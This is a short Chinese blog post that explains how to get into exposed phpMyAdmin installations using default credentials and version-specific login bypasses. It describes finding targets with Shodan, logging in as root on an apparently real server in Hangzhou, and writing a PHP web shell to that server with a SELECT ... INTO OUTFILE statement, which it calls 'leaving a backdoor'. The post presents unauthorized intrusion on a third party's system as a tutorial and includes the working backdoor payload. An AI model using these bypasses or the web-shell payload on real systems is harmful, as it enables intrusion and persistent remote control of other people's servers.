- 默認(rèn) phpMyAdmin:用戶名 root 密碼 root 或空登陸。
- 版本 2.11.3~2.11.4:用戶名 'localhost'@'@" 登陸,無需密碼。
- 版本 2.11.9.2:用戶名 root 登陸,無需密碼。
經(jīng)測(cè)試,第二個(gè)漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理從略。
下面讓我們簡單的上網(wǎng)看看能不能找到一些存在這樣漏洞的登陸頁面。
祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。
phpMyAdmin
先看看有沒有不需要密碼登陸的,逐一嘗試沒有后尋找名字中包含的版本號(hào)。這里我找到一個(gè)國內(nèi)的(浙江省·杭州市)。
地址已手動(dòng)打碼。
http://121.***.*.219:80/
登陸成功(root 權(quán)限)。
接下來你可以寫一個(gè) outfile 到對(duì)方主機(jī)的網(wǎng)絡(luò)目錄下。俗稱 “留后門”。
SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后門文件的絕對(duì)路徑"
點(diǎn)擊運(yùn)行,不出意外便在對(duì)方主機(jī)留下了一個(gè)名為 runme.php
的后門文件。
總結(jié)
以上就是這篇文章的全部內(nèi)容了,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,謝謝大家對(duì)服務(wù)器之家的支持。